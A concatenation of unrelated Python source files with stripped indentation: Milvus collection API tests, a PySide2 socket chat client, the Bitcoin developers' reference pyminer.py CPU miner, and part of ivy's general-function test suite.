expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status, result = connect.show_collections()
assert status.OK()
assert collection_name in result
def test_show_collections_ip(self, connect):
'''
target: test show collections is correct or not, if collection created
method: create collection, assert the value returned by show_collections method is equal to 0
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
status, result = connect.show_collections()
assert status.OK()
assert collection_name in result
def test_show_collections_jaccard(self, connect):
'''
target: test show collections is correct or not, if collection created
method: create collection, assert the value returned by show_collections method is equal to 0
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_collection(param)
status, result = connect.show_collections()
assert status.OK()
assert collection_name in result
def test_show_collections_hamming(self, connect):
'''
target: test show collections is correct or not, if collection created
method: create collection, assert the value returned by show_collections method is equal to 0
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_collection(param)
status, result = connect.show_collections()
assert status.OK()
assert collection_name in result
def test_show_collections_substructure(self, connect):
'''
target: test show collections is correct or not, if collection created
method: create collection, assert the value returned by show_collections method is equal to 0
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUBSTRUCTURE}
connect.create_collection(param)
status, result = connect.show_collections()
assert status.OK()
assert collection_name in result
def test_show_collections_superstructure(self, connect):
'''
target: test show collections is correct or not, if collection created
method: create collection, assert the value returned by show_collections method is equal to 0
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUPERSTRUCTURE}
connect.create_collection(param)
status, result = connect.show_collections()
assert status.OK()
assert collection_name in result
# @pytest.mark.level(2)
# def test_show_collections_without_connection(self, dis_connect):
# '''
# target: test show_collections, without connection
# method: calling show_collections with correct params, with a disconnected instance
# expected: show_collections raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.show_collections()
@pytest.mark.level(2)
def test_show_collections_no_collection(self, connect):
'''
target: test show collections is correct or not, if no collection in db
method: delete all collections,
assert the value returned by show_collections method is equal to []
expected: the status is ok, and the result is equal to []
'''
status, result = connect.show_collections()
if result:
for collection_name in result:
connect.drop_collection(collection_name)
time.sleep(drop_collection_interval_time)
status, result = connect.show_collections()
assert status.OK()
assert len(result) == 0
# TODO: enable
@pytest.mark.level(2)
def _test_show_collections_multiprocessing(self, connect, args):
'''
target: test show collections is correct or not with processes
method: create collection, assert the value returned by show_collections method is equal to 0
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
def showcollections(milvus):
status, result = milvus.show_collections()
assert status.OK()
assert collection_name in result
process_num = 8
processes = []
for i in range(process_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
p = Process(target=showcollections, args=(milvus,))
processes.append(p)
p.start()
for p in processes:
p.join()
"""
******************************************************************
The following cases are used to test `preload_collection` function
******************************************************************
"""
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
@pytest.mark.level(1)
def test_preload_collection(self, connect, collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
status = connect.preload_collection(collection)
assert status.OK()
@pytest.mark.level(1)
def test_preload_collection_ip(self, connect, ip_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
status = connect.preload_collection(ip_collection)
assert status.OK()
@pytest.mark.level(1)
def test_preload_collection_jaccard(self, connect, jac_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.add_vectors(jac_collection, vectors)
status = connect.create_index(jac_collection, index_type, index_param)
status = connect.preload_collection(jac_collection)
assert status.OK()
@pytest.mark.level(1)
def test_preload_collection_hamming(self, connect, ham_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.add_vectors(ham_collection, vectors)
status = connect.create_index(ham_collection, index_type, index_param)
status = connect.preload_collection(ham_collection)
assert status.OK()
@pytest.mark.level(2)
def test_preload_collection_not_existed(self, connect, collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
collection_name = gen_unique_str()
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
status = connect.preload_collection(collection_name)
assert not status.OK()
@pytest.mark.level(2)
def test_preload_collection_not_existed_ip(self, connect, ip_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
collection_name = gen_unique_str()
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
status = connect.preload_collection(collection_name)
assert not status.OK()
@pytest.mark.level(1)
def test_preload_collection_no_vectors(self, connect, collection):
status = connect.preload_collection(collection)
assert status.OK()
@pytest.mark.level(2)
def test_preload_collection_no_vectors_ip(self, connect, ip_collection):
status = connect.preload_collection(ip_collection)
assert status.OK()
# TODO: psutils get memory usage
@pytest.mark.level(1)
def test_preload_collection_memory_usage(self, connect, collection):
pass
class TestCollectionInvalid(object):
"""
Test creating collection with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_collection_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert not status.OK()
def test_create_collection_with_empty_collectionname(self, connect):
collection_name = ''
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def test_preload_collection_with_invalid_collectionname(self, connect):
collection_name = ''
with pytest.raises(Exception) as e:
status = connect.preload_collection(collection_name)
class TestCreateCollectionDimInvalid(object):
"""
Test creating collection with invalid dimension
"""
@pytest.fixture(
scope="function",
params=gen_invalid_dims()
)
def get_dim(self, request):
yield request.param
@pytest.mark.level(2)
@pytest.mark.timeout(5)
def test_create_collection_with_invalid_dimension(self, connect, get_dim):
dimension = get_dim
collection = gen_unique_str("test_create_collection_with_invalid_dimension")
param = {'collection_name': collection,
'dimension': dimension,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
if isinstance(dimension, int):
status = connect.create_collection(param)
assert not status.OK()
else:
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
# TODO: max / min index file size
class TestCreateCollectionIndexSizeInvalid(object):
"""
Test creating collections with invalid index_file_size
"""
@pytest.fixture(
scope="function",
params=gen_invalid_file_sizes()
)
def get_file_size(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_collection_with_invalid_file_size(self, connect, collection, get_file_size):
file_size = get_file_size
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': file_size,
'metric_type': MetricType.L2}
if isinstance(file_size, int):
status = connect.create_collection(param)
assert not status.OK()
else:
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
class TestCreateMetricTypeInvalid(object):
"""
Test creating collections with invalid metric_type
"""
@pytest.fixture(
scope="function",
params=gen_invalid_metric_types()
)
def get_metric_type(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_collection_with_invalid_file_size(self, connect, collection, get_metric_type):
metric_type = get_metric_type
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': 10,
'metric_type': metric_type}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def create_collection(connect, **params):
param = {'collection_name': params["collection_name"],
'dimension': params["dimension"],
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
return status
def search_collection(connect, **params):
status, result = connect.search_vectors(
params["collection_name"],
params["top_k"],
params["query_vectors"],
params={"nprobe": params["nprobe"]})
return status
def preload_collection(connect, **params):
status = connect.preload_collection(params["collection_name"])
return status
def has(connect, **params):
status, result = connect.has_collection(params["collection_name"])
return status
def show(connect, **params):
status, result = connect.show_collections()
return status
def delete(connect, **params):
status = connect.drop_collection(params["collection_name"])
return status
def describe(connect, **params):
status, result = connect.describe_collection(params["collection_name"])
return status
def rowcount(connect, **params):
status, result = connect.count_collection(params["collection_name"])
return status
def create_index(connect, **params):
status = connect.create_index(params["collection_name"], params["index_type"], params["index_param"])
return status
func_map = {
# 0:has,
1:show,
10:create_collection,
11:describe,
12:rowcount,
13:search_collection,
14:preload_collection,
15:create_index,
30:delete
}
def gen_sequence():
raw_seq = func_map.keys()
result = itertools.permutations(raw_seq)
for x in result:
yield x
class TestCollectionLogic(object):
@pytest.mark.parametrize("logic_seq", gen_sequence())
@pytest.mark.level(2)
def test_logic(self, connect, logic_seq, args):
if args["handler"] == "HTTP":
pytest.skip("Skip in http mode")
if self.is_right(logic_seq):
self.execute(logic_seq, connect)
else:
self.execute_with_error(logic_seq, connect)
def is_right(self, seq):
if sorted(seq) == seq:
return True
not_created = True
has_deleted = False
for i in range(len(seq)):
if seq[i] > 10 and not_created:
return False
elif seq [i] > 10 and has_deleted:
return False
elif seq[i] == 10:
not_created = False
elif seq[i] == 30:
has_deleted = True
return True
def execute(self, logic_seq, connect):
basic_params = self.gen_params()
for i in range(len(logic_seq)):
# logging.getLogger().info(logic_seq[i])
f = func_map[logic_seq[i]]
status = f(connect, **basic_params)
assert status.OK()
def execute_with_error(self, logic_seq, connect):
basic_params = self.gen_params()
error_flag = False
for i in range(len(logic_seq)):
f = func_map[logic_seq[i]]
status = f(connect, **basic_params)
if not status.OK():
# logging.getLogger().info(logic_seq[i])
error_flag = True
break
assert error_flag == True
def gen_params(self):
collection_name = gen_unique_str("test_collection")
top_k = 1
vectors = gen_vectors(2, dim)
param = {'collection_name': collection_name,
'dimension': dim,
'metric_type': MetricType.L2,
'nprobe': 1,
'top_k': top_k,
'index_type': IndexType.IVF_SQ8,
'index_param': {
'nlist': 16384
},
'query_vectors': vectors}
return param
|
client.py
|
import sys
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
from frontend.tela_login import *
from frontend.tela_chat import *
class TelaXat(QMainWindow):
def __init__(self, cs, username):
super().__init__()
self.client_socket = cs
# Load GUIs
self.tela_chat = Ui_TelaXAT()
self.tela_chat.setupUi(self)
self.tela_chat.label_user.setText(username)
self.setWindowFlags(Qt.FramelessWindowHint)
self.setAttribute(Qt.WA_TranslucentBackground)
# Mover Janela
self.tela_chat.label_user.mouseMoveEvent = self.moveWindow
self.tela_chat.cha_name.mouseMoveEvent = self.moveWindow
receive_thread = Thread(target=self.recebe)
receive_thread.start()
# Call Functions
self.tela_chat.send_message.clicked.connect(self.btSend)
self.tela_chat.button_exit.clicked.connect(self.exit_)
self.tela_chat.exit_button.clicked.connect(self.quit_)
# Functions
def btSend(self):
msg = self.tela_chat.entry_message.toPlainText()
self.client_socket.send(msg.encode())
self.tela_chat.entry_message.setText('')
def recebe(self):
"""Lida com o recebimento de mensagens"""
while True:
try:
msg = self.client_socket.recv(1024).decode("utf8")
self.tela_chat.menssage_box.append(f'@{msg}')
except OSError: # Possivelmente o cliente saiu do chat.
break
def exit_(self):
self.client_socket.close()
self.tela_login = MainWindow()
self.tela_login.show()
self.hide()
def closeEvent(self, event):
self.client_socket.close()
event.accept()
# mover janela
def mousePressEvent(self, event):
self.clickPosition = event.globalPos()
def moveWindow(self, event):
if event.buttons() == Qt.LeftButton:
self.move(self.pos() + event.globalPos() - self.clickPosition)
self.clickPosition = event.globalPos()
event.accept()
# quit Janela
def quit_(self):
self.close()
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
# Conexão com o server
HOST = "localhost"
PORT = 50000
self.ADDR = (HOST, PORT)
self.client_socket = socket(AF_INET, SOCK_STREAM)
threadConn = Thread(target=self.ver_conn)
threadConn.start()
# Load GUIs
self.ui = Ui_TelaLogin()
self.ui.setupUi(self)
self.setWindowFlags(Qt.FramelessWindowHint)
self.setAttribute(Qt.WA_TranslucentBackground)
# Mover Janela
self.ui.frame.mouseMoveEvent = self.moveWindow
self.ui.label_status.setStyleSheet(u"border-radius:5px;\n"
"background-color: rgb(255, 0, 0);")
# Call Functions
self.ui.button_login.clicked.connect(self.login)
self.ui.pushButton.clicked.connect(self.quit_)
# Functions
def ver_conn(self):
while True:
try:
self.client_socket.connect(self.ADDR)
self.ui.label_status.setStyleSheet(u"border-radius:5px;\n"
"background-color: rgb(0, 255, 0);")
self.ui.label_on_off.setText('online')
break
except:
pass
def login(self):
user = self.ui.username.text()
print(user)
self.client_socket.send(user.encode())
self.tela_chat = TelaXat(self.client_socket, f'@{user}')
self.tela_chat.show()
self.hide()
# mover janela
def mousePressEvent(self, event):
self.clickPosition = event.globalPos()
def moveWindow(self, event):
if event.buttons() == Qt.LeftButton:
self.move(self.pos() + event.globalPos() - self.clickPosition)
self.clickPosition = event.globalPos()
event.accept()
# quit Janela
def quit_(self):
self.close()
if __name__ == "__main__":
n_clients = 3 # Defina o numero de clientes a serem inicializados
app = QApplication(sys.argv)
window = [MainWindow() for _ in range(n_clients)]
for w in window:
w.show()
sys.exit(app.exec_())
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 7740
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_general.py
|
"""
Collection of tests for unified general functions
"""
# global
import os
import math
import time
import einops
import pytest
import threading
import numpy as np
from numbers import Number
from collections.abc import Sequence
import torch.multiprocessing as multiprocessing
# local
import ivy
import ivy.functional.backends.numpy
import ivy.functional.backends.jax
import ivy.functional.backends.tensorflow
import ivy.functional.backends.torch
import ivy.functional.backends.mxnet
import ivy_tests.test_ivy.helpers as helpers
# Helpers #
# --------#
def _get_shape_of_list(lst, shape=()):
if not lst:
return []
if not isinstance(lst, Sequence):
return shape
if isinstance(lst[0], Sequence):
l = len(lst[0])
if not all(len(item) == l for item in lst):
msg = 'not all lists have the same length'
raise ValueError(msg)
shape += (len(lst),)
shape = _get_shape_of_list(lst[0], shape)
return shape
# Tests #
# ------#
# set_framework
@pytest.mark.parametrize(
"fw_str", ['numpy', 'jax', 'torch', 'mxnet'])
def test_set_framework(fw_str, dev, call):
ivy.set_framework(fw_str)
ivy.unset_framework()
# use_framework
def test_use_within_use_framework(dev, call):
with ivy.functional.backends.numpy.use:
pass
with ivy.functional.backends.jax.use:
pass
with ivy.functional.backends.tensorflow.use:
pass
with ivy.functional.backends.torch.use:
pass
with ivy.functional.backends.mxnet.use:
pass
@pytest.mark.parametrize(
"allow_duplicates", [True, False])
def test_match_kwargs(allow_duplicates):
def func_a(a, b, c=2):
pass
func_b = lambda a, d, e=5: None
class ClassA:
def __init__(self, c, f, g=3):
pass
kwargs = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6}
kwfa, kwfb, kwca = ivy.match_kwargs(kwargs, func_a, func_b, ClassA, allow_duplicates=allow_duplicates)
if allow_duplicates:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'a': 0, 'd': 3, 'e': 4}
assert kwca == {'c': 2, 'f': 5, 'g': 6}
else:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'d': 3, 'e': 4}
assert kwca == {'f': 5, 'g': 6}
# def test_get_referrers_recursive(dev, call):
#
# class SomeClass:
# def __init__(self):
# self.x = [1, 2]
# self.y = [self.x]
#
# some_obj = SomeClass()
# refs = ivy.get_referrers_recursive(some_obj.x)
# ref_keys = refs.keys()
# assert len(ref_keys) == 3
# assert 'repr' in ref_keys
# assert refs['repr'] == '[1,2]'
# y_id = str(id(some_obj.y))
# y_refs = refs[y_id]
# assert y_refs['repr'] == '[[1,2]]'
# some_obj_dict_id = str(id(some_obj.__dict__))
# assert y_refs[some_obj_dict_id] == 'tracked'
# dict_refs = refs[some_obj_dict_id]
# assert dict_refs['repr'] == "{'x':[1,2],'y':[[1,2]]}"
# some_obj_id = str(id(some_obj))
# some_obj_refs = dict_refs[some_obj_id]
# assert some_obj_refs['repr'] == str(some_obj).replace(' ', '')
# assert len(some_obj_refs) == 1
# array
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"from_numpy", [True, False])
def test_array(object_in, dtype, from_numpy, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# to numpy
if from_numpy:
object_in = np.array(object_in)
# smoke test
ret = ivy.array(object_in, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(call(ivy.array, object_in, dtype, dev), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
# copy array
@pytest.mark.parametrize(
"x", [[0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_copy_array(x, dtype, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# smoke test
x = ivy.array(x, dtype, dev)
ret = ivy.copy_array(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(x))
assert id(x) != id(ret)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
# array_equal
@pytest.mark.parametrize(
"x0_n_x1_n_res", [([0.], [0.], True), ([0.], [1.], False),
([[0.], [1.]], [[0.], [1.]], True),
([[0.], [1.]], [[1.], [2.]], False)])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_array_equal(x0_n_x1_n_res, dtype, dev, call):
if call in [helpers.mx_call] and dtype in ['int16', 'bool']:
# mxnet does not support int16, and does not support bool for broadcast_equal method used
pytest.skip()
x0, x1, true_res = x0_n_x1_n_res
# smoke test
x0 = ivy.array(x0, dtype, dev)
x1 = ivy.array(x1, dtype, dev)
res = ivy.array_equal(x0, x1)
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# arrays_equal
@pytest.mark.parametrize(
"xs_n_res", [([[[0.], [1.]], [[0.], [1.]], [[1.], [2.]]], False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
def test_arrays_equal(xs_n_res, dtype, dev, call):
xs, true_res = xs_n_res
# smoke test
x0 = ivy.array(xs[0], dtype, dev)
x1 = ivy.array(xs[1], dtype, dev)
x2 = ivy.array(xs[2], dtype, dev)
res = ivy.arrays_equal([x0, x1, x2])
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert ivy.is_array(x2)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# equal
@pytest.mark.parametrize(
"x0_n_x1_n_x2_em_n_res", [([0.], [0.], [0.], False, True),
([0.], [1.], [0.], False, False),
([0.], [1.], [0.], True, [[True, False, True],
[False, True, False],
[True, False, True]]),
({'a': 0}, {'a': 0}, {'a': 1}, True, [[True, True, False],
[True, True, False],
[False, False, True]])])
@pytest.mark.parametrize(
"to_array", [True, False])
def test_equal(x0_n_x1_n_x2_em_n_res, to_array, dev, call):
x0, x1, x2, equality_matrix, true_res = x0_n_x1_n_x2_em_n_res
# smoke test
if isinstance(x0, list) and to_array:
x0 = ivy.array(x0, dev=dev)
x1 = ivy.array(x1, dev=dev)
x2 = ivy.array(x2, dev=dev)
res = ivy.all_equal(x0, x1, x2, equality_matrix=equality_matrix)
# value test
if equality_matrix:
assert np.array_equal(ivy.to_numpy(res), np.array(true_res))
else:
assert res == true_res
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support variable number of input arguments
return
# to_numpy
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_numpy(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_numpy() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_numpy(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, np.ndarray)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(ivy.to_numpy(tensor_fn(object_in, dtype, dev)), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
# to_scalar
@pytest.mark.parametrize(
"object_in", [[0.], [[[1]]], [True], [[1.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_scalar(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_scalar() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_scalar(tensor_fn(object_in, dtype, dev))
true_val = ivy.to_numpy(ivy.array(object_in, dtype=dtype)).item()
# type test
assert isinstance(ret, type(true_val))
# value test
assert ivy.to_scalar(tensor_fn(object_in, dtype, dev)) == true_val
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support scalar conversion
return
# to_list
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_list(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_list(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, list)
# cardinality test
assert _get_shape_of_list(ret) == _get_shape_of_list(object_in)
# value test
assert np.allclose(np.asarray(ivy.to_list(tensor_fn(object_in, dtype, dev))),
np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support list conversion
return
# shape
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_shape(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.shape(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, tuple)
